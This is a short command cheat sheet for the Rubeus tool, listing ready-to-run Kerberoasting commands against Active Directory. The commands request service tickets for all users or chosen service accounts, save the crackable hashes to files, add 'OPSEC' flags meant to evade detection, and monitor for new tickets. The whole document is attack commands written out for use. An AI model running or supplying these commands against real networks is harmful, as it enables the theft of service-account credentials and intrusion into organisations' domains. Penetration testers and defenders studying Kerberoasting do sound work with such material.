% Rubeus

# list kerberoast stats
.\Rubeus.exe kerberoast /stats

# list kerberoast stats (OPSEC)
.\Rubeus.exe kerberoast /stats /rc4opsec

# request kerberoast TGS all users
.\Rubeus.exe kerberoast /simple

# request kerberoast TGS for user
.\Rubeus.exe kerberoast /user:<serviceaccount> /simple

# request kerberoast TGS for user (OPSEC)
.\Rubeus.exe kerberoast /user:<serviceaccount> /simple /rc4opsec

# request kerberoast TGS all users an save to file 
.\Rubeus.exe kerberoast /outfile:<outfile-path>

# request kerberoast TGS all users an save to file (OPSEC)
.\Rubeus.exe kerberoast /rc4opsec /outfile:<outfile-path>

# monitor for new tickets
.\Rubeus.exe monitor /interval:<interval> /nowrap

# monitor for new tickets of specific account
.\Rubeus.exe monitor /targetuser:<targetuser> /interval:<interval> /nowrap

